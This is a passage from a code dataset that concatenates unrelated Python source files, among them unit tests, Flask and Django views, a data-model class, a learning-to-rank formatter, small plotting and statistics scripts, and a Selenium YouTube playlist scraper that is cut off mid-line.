new_fish.values()\n\n self.assertTrue(set(last_fish_props) == set(new_fish_props))\n\n # action for remove\n data_helper.remove_fish(last_id)\n\n # assert for remove\n self.assertEqual(amount_was, data_helper.get_fishes().__len__())\n\n def test_crud_car(self):\n # assign for add\n data_helper = dh.DataHelper()\n amount_was = data_helper.get_cars().__len__()\n car = OrderedDict([('Brand', 'BMW'), ('Model', 'M5'), ('Color', 'Black'), ('Year', 2012), ('ImageUrl', '')])\n\n # action for add\n data_helper.add_car(car['Brand'], car['Model'], car['Color'], car['Year'], car['ImageUrl'])\n\n # assert for add\n last_car = data_helper.get_cars()[amount_was]\n\n last_car_props = []\n for prop in last_car:\n last_car_props.append(prop)\n last_car_props = last_car_props[1:]\n\n car_props = car.values()\n\n self.assertTrue(set(last_car_props) == set(car_props))\n self.assertEquals(amount_was, data_helper.get_cars().__len__() - 1)\n\n # assign for update\n new_car = OrderedDict(\n [('Brand', 'Mercedes'), ('Model', 'C200'), ('Color', 'While'), ('Year', 2012), ('ImageUrl', '')])\n last_id = data_helper.get_cars()[amount_was][0]\n\n # action for update\n data_helper.update_car(last_id, new_car['Brand'], new_car['Model'], new_car['Color'], new_car['Year'],\n new_car['ImageUrl'])\n\n # assert for update\n last_car = data_helper.get_cars()[amount_was]\n\n last_car_props = []\n for prop in last_car:\n last_car_props.append(prop)\n last_car_props = last_car_props[1:]\n\n new_car_props = new_car.values()\n\n self.assertTrue(set(last_car_props) == set(new_car_props))\n self.assertEquals(amount_was, data_helper.get_cars().__len__() - 1)\n\n # action for remove\n data_helper.remove_car(last_id)\n\n # assert for remove\n self.assertEqual(amount_was, data_helper.get_cars().__len__())\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"TestDataHelper.py","file_name":"TestDataHelper.py","file_ext":"py","file_size_in_byte":3622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"434453779","text":"\"\"\"Author: Piotr Orpel, 2020\"\"\"\nimport json\nfrom copy import deepcopy\n\nfrom app_code.common.model.exceptions import OptionalFieldNotFound, MissingField, NoDefaultValue, InvalidData, \\\n InvalidField\n\n\nclass Model(object):\n\n def __init__(self, key=None, object_name=None, description='', required=True,\n default=None, hidden=False):\n \"\"\"Model initialization\n\n Args:\n key (str or None): key under which this model expects data and is saved.\n object_name (str or None): name that is to be used in the swagger for this model\n description (str): description of this model\n required (bool): flag if this field is required in the data\n default (bool or None): default value for this model\n hidden (bool): flag if this field is hidden in swagger\n \"\"\"\n self.key = key\n self.object_name = object_name\n self.description = description\n self.required = required\n self.default_value = default\n if self.default_value is not None:\n self.required = False\n self.value = default\n self.hidden = hidden\n\n self.conditions = []\n self.converter = None\n\n def with_condition(self, condition):\n \"\"\"Adds condition that is verified during data loading.\n\n Args:\n condition (function): function that defines a condition which the data must pass to be loaded\n\n Returns:\n self\n\n Examples:\n - Defining condition - in this case a simple length check - arguments are fixed and must be provided as\n in example.\n\n def condition(key, data):\n if len(data) > 256:\n raise InvalidData\n\n - Adding condition:\n model.with_condition(condition)\n \"\"\"\n self.conditions.append(condition)\n return self\n\n def with_converter(self, converter):\n \"\"\"Adds converter that is executed on loaded data before processing.\n\n Args:\n converter (function): function that converts loaded data\n\n Returns:\n self\n\n Examples:\n - Defining converter - arguments are fixed and must be provided as in example:\n def converter(data):\n return int(data)\n\n model.with_converter(converter)\n \"\"\"\n self.converter = converter\n return self\n\n @property\n def json(self):\n \"\"\"Returns JSON formatted string\"\"\"\n return json.dumps(self.dict())\n\n def swagger_type(self):\n \"\"\"Returns swagger data type of this object\"\"\"\n raise NotImplementedError\n\n def swagger(self, prop, only_value=False, force_hidden=False):\n \"\"\"Returns specific definitions for given model that are to be saved in the swagger\"\"\"\n raise NotImplementedError\n\n def swagger_definition(self, only_value=False, force_hidden=False):\n \"\"\"Creates swagger definition for the model\"\"\"\n if self.hidden and not force_hidden:\n return\n prop = {\n 'type': self.swagger_type(),\n }\n if self.description is not None:\n prop['description'] = self.description\n\n self.swagger(prop)\n\n if self.key is not None or self.object_name is not None:\n return {self.key or self.object_name: prop} if not only_value else prop\n return prop\n\n def dict(self, data=None):\n \"\"\"Creates dictionary containing value stored in the model.\n\n If model has a key defined then value returned is in format:\n {self.key: self.value}\n else:\n self.value\n \"\"\"\n data = data or {}\n if self.key:\n data[self.key] = self.value\n return data\n return self.value\n\n def load(self, data, load_hidden=True, parent_key=''):\n \"\"\"Loads data to the model\n\n Args:\n data: data to be loaded\n load_hidden (bool): flag if should load hidden from swagger variables in the model\n parent_key (string): internal argument\n \"\"\"\n # Set default value\n self.value = self.default_value if not isinstance(self.default_value, list) or not isinstance(\n self.default_value, dict) else deepcopy(self.default_value)\n try:\n # Skip hidden elements\n if not load_hidden and self.hidden:\n return\n\n if not self.required and self.default_value is None and not self.key in data:\n self.value = OptionalFieldNotFound\n return\n # If data schema has a key defined verify data\n\n if self.key:\n # Set parent key reference name\n parent_key = self.key if parent_key == '' else f'{parent_key}.{self.key}'\n\n # Check if key is in data\n if data is None or self.key not in data:\n if self.required:\n raise MissingField(parent_key)\n if self.default_value is None:\n raise NoDefaultValue(parent_key)\n return\n # Check if data is a dictionary\n if not isinstance(data, dict):\n raise InvalidData()\n\n dat = data[self.key] if self.key else data\n\n if self.converter:\n dat = self.converter(dat)\n\n for condition in self.conditions:\n condition(parent_key, dat)\n\n self._load(\n data=dat,\n load_hidden=load_hidden,\n parent_key=parent_key\n )\n except (InvalidField, NoDefaultValue) as e:\n self.value = None\n raise e\n except MissingField as e:\n self.value = None\n # TODO: RETHINK IF SHOULD RAISE ERROR ONLY WHEN REQUIRED\n if self.required:\n raise e\n except (AttributeError, TypeError, ValueError) as e:\n print(e)\n raise InvalidData\n\n def _load(self, data, load_hidden=True, parent_key=''):\n raise NotImplementedError\n\n def get_element(self, name=None, node=False):\n \"\"\"Retrieves specified element from schema.\n\n Args:\n name (str or list of str): name or path leading to requested element\n node (bool): flag if expects schema element or it's value\n\n Returns:\n\n \"\"\"\n if self.value == OptionalFieldNotFound:\n return self.value\n if not name or len(name) == 0:\n if node:\n return self\n value = self.dict()\n return value.get(self.key, value) if isinstance(value, dict) else value\n\n # Get current element's name\n cur_name = name.pop(0) if isinstance(name, list) else name\n\n # Get current element's value\n item = self._get_element_value(cur_name)\n # Handle nested elements\n if isinstance(item, Model):\n if isinstance(name, list):\n return item.get_element(name, node)\n if node:\n return item\n value = item.dict()\n return value.get(item.key, value) if isinstance(value, dict) else value\n return item\n\n def _get_element_value(self, name):\n return self.value\n\n def print_tree(self, indent_numb=0):\n \"\"\"Prints data\"\"\"\n indent = ''.join('\\t' for _ in range(indent_numb))\n if self.key:\n print(f'{indent}key: {self.key}; value: {self.value}')\n\n def new(self):\n \"\"\"Returns new instance of given model, doesn't copy values\"\"\"\n raise NotImplementedError\n","sub_path":"app_code/common/model/types/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":7666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"383622488","text":"from cyder.cydns.nameserver.nameserver.forms import NameserverForm\nfrom cyder.cydns.nameserver.nameserver.models import Nameserver\nfrom cyder.cydns.nameserver.views import *\n\n\nclass NSView(object):\n model = Nameserver\n form_class = NameserverForm\n queryset = Nameserver.objects.all()\n\n\nclass NSDeleteView(NSView, CydnsDeleteView):\n \"\"\" \"\"\"\n\n\nclass NSDetailView(NSView, CydnsDetailView):\n template_name = \"nameserver/nameserver_detail.html\"\n\n\nclass NSListView(NSView, CydnsListView):\n \"\"\" \"\"\"\n template_name = \"nameserver/nameserver_list.html\"\n\n\nclass NSCreateView(NSView, CydnsCreateView):\n \"\"\" \"\"\"\n\n\nclass NSUpdateView(NSView, CydnsUpdateView):\n \"\"\" \"\"\"\n","sub_path":"cyder/cydns/nameserver/nameserver/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"201632771","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\n\"\"\"\n@version: 0.1\n@author: Yang Reid\n@license: Apache Licence \n@contact: yangtao584@126.com\n@site: http://www.phpgao.com\n@software: PyCharm Community Edition\n@file: orderDict.py\n@time: 2018/1/15 19:10\n\"\"\"\nimport collections\n\ndef func():\n\n\n print('Regular dictionary:')\n d = {}\n d['a'] = 'A'\n d['b'] = 'B'\n d['c'] = 'C'\n d['d'] = 'D'\n d['e'] = 'E'\n\n for k, v in d.items():\n print(k, v)\n\n print('\\nOrderedDict:')\n d = collections.OrderedDict()\n d['a'] = 'A'\n d['b'] = 'B'\n d['c'] = 'C'\n d['d'] = 'D'\n d['e'] = 'E'\n\n for k, v in d.items():\n print(k, v)\n\n\n\n\n\nif __name__ == '__main__':\n func()","sub_path":"advancedDict/orderDict.py","file_name":"orderDict.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"205571409","text":"import datetime\nfrom typing import Tuple, Any\n\nfrom flask import jsonify, request, Blueprint\nfrom flask_jwt_extended import jwt_optional\nfrom marshmallow import ValidationError\n\nfrom app import db\nfrom app.models import Directory, Project\nfrom app.schemas import DirectorySchema\nfrom app.utils.helpers import get_user, get_sub_directory_from_path\nfrom app.utils.responses import make_resp, NOT_FOUND, UNAUTHORIZED, FORBIDDEN, NO_JSON\n\ndirectory_bp = Blueprint(\"directories\", __name__)\n\ndirectory_schema = DirectorySchema()\nin_directory_schema = DirectorySchema(exclude=(\"parent_id\",))\n\n# @directory_bp.route('/project//directories/', methods=[\"POST\"])\n# @directory_bp.route('/project//directories/', methods=[\"POST\"])\n# @jwt_optional\n# def create_project_directory(project_id: int = None, project_name: str = None) -> Tuple[Any, int]:\n# project = Project.query.get(project_id) if project_id else Project.query.filter(Project.name == project_name).first()\n# if not project:\n# return make_resp(NOT_FOUND)\n# if not get_user():\n# return make_resp(UNAUTHORIZED)\n# if project.user != get_user():\n# return make_resp(FORBIDDEN)\n# if not request.is_json:\n# return make_resp(NO_JSON)\n# try:\n# directory = directory_schema.load(request.get_json())\n# project.last_modified = datetime.datetime.now()\n# except ValidationError as errors:\n# return errors.messages, 422\n# db.session.add(directory)\n# db.session.commit()\n# return jsonify(data=directory_schema.dump(directory)), 200\n\n@directory_bp.route(\"/project//create-directory-in/\", methods=[\"POST\"])\n@directory_bp.route(\"/project//create-directory-in/\", methods=[\"POST\"])\n@directory_bp.route(\"/project//create-directory-in//\", methods=[\"POST\"])\n@directory_bp.route(\"/project//create-directory-in//\", methods=[\"POST\"])\n@jwt_optional\ndef create_directory_with_path(project_id: int = None, project_name: str = None, parent_dir_path: str = \"\") -> Tuple[Any, int]:\n project = Project.query.get(project_id) if project_id else Project.query.filter(\n Project.name == project_name.lower()).first()\n if not get_user():\n return make_resp(UNAUTHORIZED)\n if not project:\n return make_resp(NOT_FOUND)\n if project.user != get_user():\n return make_resp(FORBIDDEN)\n if not request.is_json:\n return make_resp(NO_JSON)\n parent_dir = get_sub_directory_from_path(project.root_directory, parent_dir_path)\n if not parent_dir:\n return make_resp(NOT_FOUND)\n try:\n directory = in_directory_schema.load(request.get_json())\n directory.parent = parent_dir\n project.last_modified = datetime.datetime.utcnow()\n except ValidationError as errors:\n return errors.messages, 422\n db.session.add(directory)\n db.session.commit()\n return jsonify(data=directory_schema.dump(directory)), 200\n\n\n@directory_bp.route(\"/directory//\", methods=[\"GET\", \"PUT\", \"DELETE\"])\n@jwt_optional\ndef directory(id: int) -> Tuple[Any, int]:\n directory = Directory.query.get(id)\n if not directory:\n return make_resp(NOT_FOUND)\n if request.method == \"GET\":\n return jsonify(data=directory_schema.dump(directory)), 200\n elif request.method == \"PUT\":\n if directory.project.user != get_user():\n return make_resp(FORBIDDEN)\n if not request.is_json:\n return make_resp(NO_JSON)\n try:\n directory = directory_schema.load(request.get_json(), instance=directory, partial=True)\n directory.project.last_modified = datetime.datetime.utcnow()\n except ValidationError as errors:\n return errors.messages, 422\n db.session.commit()\n return jsonify(data=directory_schema.dump(directory)), 200\n elif request.method == \"DELETE\":\n if directory.project.user != get_user():\n return make_resp(FORBIDDEN)\n db.session.delete(directory)\n db.session.commit()\n return make_resp(({\"msg\": \"success\"}, 200))\n","sub_path":"app/blueprints/directories.py","file_name":"directories.py","file_ext":"py","file_size_in_byte":4178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"546695540","text":"# vim: set ts=8 sw=4 sts=4 et ai:\nfrom django.core.cache import cache\nfrom django.core.exceptions import PermissionDenied\nfrom django.shortcuts import get_object_or_404\nfrom osso.core.decorators import login_with_profile_required\nfrom osso.userchat.filters import pre_send_run\nfrom osso.userchat.models import CACHE_TIME, Channel, Message\nfrom osso.xhr import JsonResponse\n\n\ndef messages_to_json(messages, user=None):\n '''\n Convert a list of channel messages to something usable, JSON-wise.\n '''\n json = []\n for msg in messages:\n value = {\n 'id': msg.id,\n 'time': msg.timestamp.strftime('%H:%M'),\n 'body': msg.body,\n }\n if msg.sender is not None:\n value['sender'] = msg.sender.username\n\n extra_class = []\n if user == msg.sender:\n extra_class.append('is-my-message')\n if len(extra_class):\n value['extra_class'] = ' '.join(extra_class)\n json.append(value)\n return json\n\n\ndef qarg_to_pairs(string_q):\n '''\n Convert a string of dash-delimited integers to a list of 2-tuples.\n E.g. 1-0-2-0 to [(1, 0), (2, 0)].\n '''\n try:\n tmp = [int(i) for i in string_q.split('-')]\n except ValueError:\n return []\n if len(tmp) % 2 != 0:\n return []\n\n ret = []\n for i in range(0, len(tmp), 2):\n ret.append((tmp[i], tmp[i + 1]))\n return ret\n\n\n@login_with_profile_required\ndef channel(request, channel_id):\n # The optional argument gt=\n try:\n last_message_id = int(request.GET.get('gt', 0))\n except ValueError:\n last_message_id = 0\n\n # Get all necessary prerequisites.\n group_ids = list(request.user.groups.values_list('id', flat=True))\n exclude_empty_sender = False\n try:\n relation_id = request.active_relation_id\n except AttributeError:\n relation_id = request.user.authenticatablecontact.relation_id\n channels = Channel.objects.filter(relation__id=relation_id,\n groups__in=group_ids).distinct()\n channel = get_object_or_404(channels, pk=channel_id)\n\n # Add message if this is a post request.\n if request.method == 'POST':\n try:\n body = request.POST.get('body')\n except IOError:\n # As this is loaded through AJAX asynchronously, it can\n # happen that the client disconnects during the POST:\n # IOError: Client read error (Timeout?)\n return JsonResponse(request, '[]')\n\n if body is not None:\n body = body.strip()\n if body != '':\n channel.create_message(body=body, sender=request.user)\n\n # Get messages greater than last_message_id.\n message_qs = channel.messages.filter(id__gt=last_message_id)\n if exclude_empty_sender:\n message_qs = message_qs.exclude(sender=None)\n if hasattr(message_qs, 'prefetch_related'):\n message_qs = message_qs.prefetch_related('sender')\n else:\n message_qs = message_qs.select_related('sender')\n messages = message_qs.order_by('timestamp').distinct()\n\n # Run it through the message filters.\n final_messages = []\n for message in messages:\n message = pre_send_run(message, channel_id=channel_id,\n group_ids=group_ids)\n if message:\n final_messages.append(message)\n\n json = messages_to_json(final_messages, user=request.user)\n return JsonResponse(request, json, compact=True)\n\n\n# Don't require login with profile here yet. First check it later on\n# when the cache tells us that there *are* new messages and we need to\n# fetch them. This saves us a query. For the userchat /multiq/ that's\n# pretty much, since a lot of users call this every couple of seconds.\ndef multiple_channels(request):\n # The argument q= holds the channel_id-gt_value tuples, e.g.\n # 1-0-2-45 means channel 1 from id 0 and channel 2 from id 45.\n pairs = qarg_to_pairs(request.GET.get('q'))\n\n # Get all necessary prerequisites first when we need them.\n json = {}\n relation_id, group_ids, exclude_empty_sender = None, None, False\n\n for channel_id, message_id in pairs:\n # The cache stores the last message id. If we're looking for a\n # different id, go do actual work.\n cache_key = 'osso.userchat.channel%d' % channel_id\n if cache.get(cache_key) != message_id:\n # Fetch relation_id and group_ids the first time in the\n # loop.\n if relation_id is None:\n if request.user.is_anonymous():\n raise PermissionDenied()\n try:\n relation_id = request.active_relation_id\n except AttributeError:\n try:\n relation_id = request.user.authenticatablecontact.relation_id\n except:\n raise PermissionDenied()\n group_ids = list(request.user.groups\n .values_list('id', flat=True))\n\n # Check the channels for permissions, if there is\n # something fishy, bail out and return the empty dict.\n if Channel.objects.filter(\n id__in=[i[0] for i in pairs],\n relation__id=relation_id,\n groups__in=group_ids).distinct().count() != len(pairs):\n return JsonResponse(request, {}, compact=True)\n\n message_qs = Message.objects.filter(\n id__gt=message_id, channel__id=channel_id)\n if exclude_empty_sender:\n message_qs = message_qs.exclude(sender=None)\n if hasattr(message_qs, 'prefetch_related'):\n message_qs = message_qs.prefetch_related('sender')\n else:\n message_qs = message_qs.select_related('sender')\n messages = list(message_qs.order_by('timestamp'))\n\n # Run it through the message filters.\n final_messages = []\n for message in messages:\n message = pre_send_run(message, channel_id=channel_id,\n group_ids=group_ids)\n if message:\n final_messages.append(message)\n\n if len(final_messages):\n json[channel_id] = messages_to_json(final_messages,\n user=request.user)\n if len(messages):\n # Store the last one we found, even if it was filtered.\n last_id = messages[-1].id\n else:\n # Attempt to set the cache for subsequent requests. But\n # don't go above the message_id we checked, in case\n # there is a new message just now.\n last_id = None\n messages = list(Message.objects.filter(channel__id=channel_id,\n id__lte=message_id)\n .order_by('-id')[0:1])\n if len(messages):\n last_id = messages[0].id\n\n if last_id is not None:\n cache.set(cache_key, last_id, CACHE_TIME)\n\n return JsonResponse(request, json, compact=True)\n","sub_path":"osso/userchat/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"199040599","text":"import json\nfrom LTRLibrary import LTRLibrary\n\nPAIRWISE_THRESHOLD = 1.e-1\nFEATURE_DIFF_THRESHOLD = 1.e-6\n\nclass LibraryFormatter(LTRLibrary):\n\n def processQueryDocFeatureVector(self,docClickInfo,trainingFile, min_max=False):\n '''Expects as input a sorted by queries list or generator that provides the context\n for each query in a tuple composed of: (query , docId , relevance , source , featureVector).\n The list of documents that are part of the same query will generate comparisons\n against each other for training. '''\n with open(trainingFile,\"w\") as output:\n self.featureNameToId = {}\n self.featureIdToName = {}\n self.curFeatIndex = 1;\n curListOfFv = []\n curQueryAndSource = \"\"\n for query,docId,relevance,source,featureVector in docClickInfo:\n if curQueryAndSource != query + source:\n #Time to flush out all the pairs\n _writeRankSVMPairs(curListOfFv,output);\n curListOfFv = []\n curQueryAndSource = query + source\n curListOfFv.append((relevance,self._makeFeaturesMap(featureVector)))\n _writeRankSVMPairs(curListOfFv,output); #This catches the last list of comparisons\n\n def convertLibraryModelToLtrModel(self, libSvmModelLocation, outputFile, modelName, featureStoreName, useMinMax, min_max):\n with open(libSvmModelLocation, 'r') as inFile:\n content = {}\n\n content[\"class\"] = \"org.apache.solr.ltr.model.LinearModel\"\n content[\"store\"] = str(featureStoreName)\n content[\"name\"] = str(modelName)\n content[\"features\"] = []\n\n for featKey in self.featureNameToId.keys():\n if useMinMax:\n min_, max_ = min_max[featKey][\"min\"], min_max[featKey][\"max\"]\n norm = {\"class\": \"org.apache.solr.ltr.norm.MinMaxNormalizer\", \"params\":{ \"min\": min_, \"max\": max_ } }\n content[\"features\"].append({\"name\" : featKey, \"norm\": norm})\n else:\n content[\"features\"].append({\"name\" : featKey})\n\n content[\"params\"] = {\"weights\":{}}\n\n startReading = False\n counter = 1\n for line in inFile:\n if startReading:\n newParamVal = float(line.strip())\n content[\"params\"][\"weights\"][self.featureIdToName[counter]] = float(newParamVal)\n counter += 1\n elif line.strip() == 'w':\n startReading = True\n\n with open(outputFile,'w') as convertedOutFile:\n json.dump(content, convertedOutFile, sort_keys=False, indent=4)\n\ndef _writeRankSVMPairs(listOfFeatures,output):\n '''Given a list of (relevance, {Features Map}) where the list represents\n a set of documents to be compared, this calculates all pairs and\n writes the Feature Vectors in a format compatible with libSVM.\n Ex: listOfFeatures = [\n #(relevance, {feature1:value, featureN:value})\n (4, {1:0.9, 2:0.9, 3:0.1})\n (3, {1:0.7, 2:0.9, 3:0.2})\n (1, {1:0.1, 2:0.9, 6:0.1})\n ]\n '''\n for d1 in range(0,len(listOfFeatures)):\n for d2 in range(d1+1,len(listOfFeatures)):\n doc1,doc2 = listOfFeatures[d1], listOfFeatures[d2]\n fv1,fv2 = doc1[1],doc2[1]\n d1Relevance, d2Relevance = float(doc1[0]),float(doc2[0])\n if d1Relevance - d2Relevance > PAIRWISE_THRESHOLD:#d1Relevance > d2Relevance\n outputLibSvmLine(\"+1\",subtractFvMap(fv1,fv2),output);\n outputLibSvmLine(\"-1\",subtractFvMap(fv2,fv1),output);\n elif d1Relevance - d2Relevance < -PAIRWISE_THRESHOLD: #d1Relevance < d2Relevance:\n outputLibSvmLine(\"+1\",subtractFvMap(fv2,fv1),output);\n outputLibSvmLine(\"-1\",subtractFvMap(fv1,fv2),output);\n else: #Must be approximately equal relevance, in which case this is a useless signal and we should skip\n continue;\n\ndef subtractFvMap(fv1,fv2):\n '''returns the fv from fv1 - fv2'''\n retFv = fv1.copy();\n for featInd in fv2.keys():\n subVal = 0.0;\n if featInd in fv1:\n subVal = fv1[featInd] - fv2[featInd]\n else:\n subVal = -fv2[featInd]\n if abs(subVal) > FEATURE_DIFF_THRESHOLD: #This ensures everything is in sparse format, and removes useless signals\n retFv[featInd] = subVal;\n else:\n retFv.pop(featInd, None)\n return retFv;\n\ndef outputLibSvmLine(sign,fvMap,outputFile):\n outputFile.write(sign)\n for feat in fvMap.keys():\n outputFile.write(\" \" + str(feat) + \":\" + str(fvMap[feat]));\n outputFile.write(\"\\n\")\n","sub_path":"libsvm_formatter.py","file_name":"libsvm_formatter.py","file_ext":"py","file_size_in_byte":4767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"142048432","text":"from __future__ import division, print_function, unicode_literals\r\nimport sys\r\nprint(sys.version)\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\n#load data\r\nxls = pd.ExcelFile('D:\\AHocMay\\BTL\\VN.csv')\r\ndata = pd.read_excel(xls, 'Sheet1BC')\r\n\r\n#plot diagram avgmonths of year\r\nTempAvg = data.iloc[0:12, 16:18]\r\nmonth = np.arange(1, 13, 1)#print(12 month)\r\n#print(TempAvg) print(month)\r\nX = month\r\ny = TempAvg\r\nplt.plot(X, y, 'ro')\r\nplt.axis([0, 12, 10, 35])\r\nplt.title('Display Average Temperature of months from 2002-2017')\r\nplt.xlabel('Month ')\r\nplt.ylabel('Temp ( C)')\r\n#plt.show()\r\n\r\n#display 12 diagrams of temp of 12 months\r\ndef PlotTemp_Month (Time, Temperature):\r\n X_year = Time\r\n y_month = Temperature\r\n plt.plot(X_year, y_month, 'ro')\r\n plt.axis([2002, 2017, 5, 35])\r\n plt.title('Display Temperature of month from 2002 to 2017.')\r\n plt.xlabel('Year ')\r\n plt.ylabel('Temp (C)')\r\n plt.show()\r\n#display 12 diagrams continuos\r\nfor i in range(2, 13):\r\n Timee = data.iloc[13*i:(13*i+15), 15:16]\r\n Temp_Feb = data.iloc[13*i:(13*i+15), 1:2]\r\n PlotTemp_Month(Timee, Temp_Feb)\r\n \r\n","sub_path":"Weather_Display.py","file_name":"Weather_Display.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"365501862","text":"# -*- encoding=utf-8 -*-\r\n\r\nimport re\r\nimport os\r\nimport codecs\r\nimport xlwt\r\n\r\n# Global Params Start.\r\nFILE_SUFFIX = '.cs'\r\n# PUMP_RE = '.*?PostAPI.*?webApi.*?' #SFDC_API_Post\r\nPUMP_RE = '\"/SFDC.*?\"' #SFDC_API\r\n#PUMP_RE = '.*?GetAPI.*?webApi.*?' #SFDC_API_Get\r\nROOT_PATH = 'C:\\\\Users\\\\da.long\\\\source\\\\Workspaces\\\\OCE Wechat Demo'\r\nEXCEL_FILE_NAME = u'SFDC_API_bak.xls'\r\nRESULT = xlwt.Workbook(encoding='utf-8', style_compression=0)\r\nsheet = RESULT.add_sheet('SFDC_API', cell_overwrite_ok=True)\r\nsheet.write(0, 0, 'API')\r\nsheet.write(0, 1, 'cs_file')\r\nsheet.write(0, 2, 'line')\r\nn = 1\r\n# Global Params End.\r\n\r\n\r\n# Get a specified suffix file list from ROOT_PATH.\r\ndef get_all_files(root_path):\r\n name_list = []\r\n for root, dirs, files in os.walk(root_path): # 遍历所有目录,包括自身\r\n for file in files: # 遍历文件,抓取指定文件\r\n pre, suf = os.path.splitext(file)\r\n if suf == FILE_SUFFIX:\r\n name_list.append(os.path.join(root, file))\r\n print(name_list.__len__())\r\n return name_list\r\n\r\n\r\n# Reguar Expression match.\r\ndef find_re(line, line_num, file_name):\r\n line_list = []\r\n\r\n pattern = re.compile(PUMP_RE, re.S)\r\n api_list = re.findall(pattern, line)\r\n for item in api_list:\r\n if item is not None:\r\n line_list.append({\r\n 'api_name': item[2:].split('\"')[0],\r\n 'file_name': file_name,\r\n 'line': line_num\r\n })\r\n if line_list.__len__() > 0:\r\n # print(line_list)\r\n return line_list\r\n else:\r\n return\r\n\r\n\r\n# Read a file, find if there is matched pattern in file, and return the result.\r\ndef pump_file(file):\r\n ret_list = []\r\n\r\n file_obj = codecs.open(file, 'r', 'utf-8')\r\n i = 1\r\n while True:\r\n line = file_obj.readline() # 只读取一行内容\r\n if not line: # 判断是否读取到内容\r\n break\r\n line_match_list = find_re(line, i, file)\r\n i += 1\r\n if line_match_list is not None:\r\n ret_list.extend(line_match_list)\r\n # print(ret_list)\r\n file_obj.close()\r\n\r\n return ret_list\r\n\r\n\r\n# If a file's content matches PUMP_RE, then save the result into excel.\r\ndef save_to_excel(ret_list):\r\n for item in ret_list:\r\n api_name = item['api_name']\r\n file_name = item['file_name']\r\n line = item['line']\r\n\r\n global n\r\n sheet.write(n, 0, api_name)\r\n sheet.write(n, 1, file_name)\r\n sheet.write(n, 2, line)\r\n n = n + 1\r\n\r\n\r\ndef test():\r\n pump_file('C:\\\\Users\\\\da.long\\\\source\\\\Workspaces\\\\MFP_Merck\\\\test.cs')\r\n\r\n\r\ndef main():\r\n file_list = get_all_files(ROOT_PATH)\r\n # test()\r\n for file in file_list:\r\n ret_list = pump_file(file)\r\n if ret_list is not None:\r\n save_to_excel(ret_list)\r\n return\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\nRESULT.save(EXCEL_FILE_NAME)\r\n\r\n\r\n","sub_path":"PumpData/bak_test.py","file_name":"bak_test.py","file_ext":"py","file_size_in_byte":2930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"273663477","text":"\"\"\"\n@difficulty: medium\n@tags: misc\n@notes: Basic statistic calculations. \n\"\"\"\nclass Solution(object):\n def sampleStats(self, count):\n \"\"\"\n :type count: List[int]\n :rtype: List[float]\n \"\"\"\n minimum, maximum, mean, median, mode = [255, 0, 0, 0, 0]\n _count, _modeCount = 0, 0\n for i, val in enumerate(count):\n if val > 0 and i < minimum:\n minimum = i\n if val > 0 and i > maximum:\n maximum = i\n if val > _modeCount:\n mode = i\n _modeCount = val\n if val > 0:\n mean = float(mean * _count + val * i) / (_count + val)\n _count += val\n _medianCount = _count / 2.0\n _tempCount = 0\n for i in range(0, len(count) - 1):\n _tempCount += count[i]\n if _tempCount == _medianCount:\n median = (i + i + 1) / 2.0\n break\n if _tempCount < _medianCount and _tempCount + count[i+1] > _medianCount:\n median = i + 1\n break\n return map(float, [minimum, maximum, mean, median, mode])\n","sub_path":"solution/python/1093.py","file_name":"1093.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"526423357","text":"import time, random, csv, re, requests\nfrom scrapy.selector import Selector\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.keys import Keys\n\nclass ChannelFinder():\n\n def __init__(self):\n chrome_options = Options()\n #chrome_options.add_argument(\"--headless\")\n #chrome_options.add_argument('--proxy-server=%s' % '192.161.166.122:3128')\n chrome_options.add_argument(\"--window-size=1920x1080\")\n\n path_to_chromedriver = 'chromedriver'\n self.driver = webdriver.Chrome(chrome_options=chrome_options, executable_path=path_to_chromedriver)\n\n def crawl(self, depth, keyword):\n\n playlists = []\n keyword = keyword.strip()\n print(\"keyword [{}]\".format(keyword))\n driver = self.driver\n driver.get('https://www.youtube.com/results?search_query={}'.format(keyword))\n\n # Searching for only playlists\n filter_btn = driver.find_elements_by_xpath(\".//paper-button[contains(@aria-label, 'Search filters')]\")[0]\n filter_btn.click()\n time.sleep(1)\n playlist_btn = driver.find_elements_by_xpath(\".//div[contains(@title, 'Search for Playlist')]\")[0]\n playlist_btn = playlist_btn.find_element_by_xpath('..')\n playlist_btn.click()\n time.sleep(1)\n\n for i in range(depth):\n print(i)\n html = driver.find_element_by_tag_name('html')\n html.send_keys(Keys.PAGE_DOWN)\n html.send_keys(Keys.PAGE_DOWN)\n time.sleep(random.uniform(0.05, 0.1))\n\n response = Selector(text=str(driver.page_source))\n for r in response.xpath(\"//*[contains(@class, 'ytd-item-section-renderer')]\"):\n try:\n playlist_url = 'https://www.youtube.com'+r.xpath(\".//a[contains(@href, '/watch?v=')]/@href\").extract_first()\n print(playlist_url)\n\n if playlist_url not in playlists:\n playlists.append(playlist_url)\n except:\n print('gay')\n driver.quit()\n\n # getting all videos from playlists\n videos = []\n\n ind = 0\n for playlist in playlists:\n ind += 1\n print(ind,len(playlists))\n r = requests.get(url=playlist)\n videos += 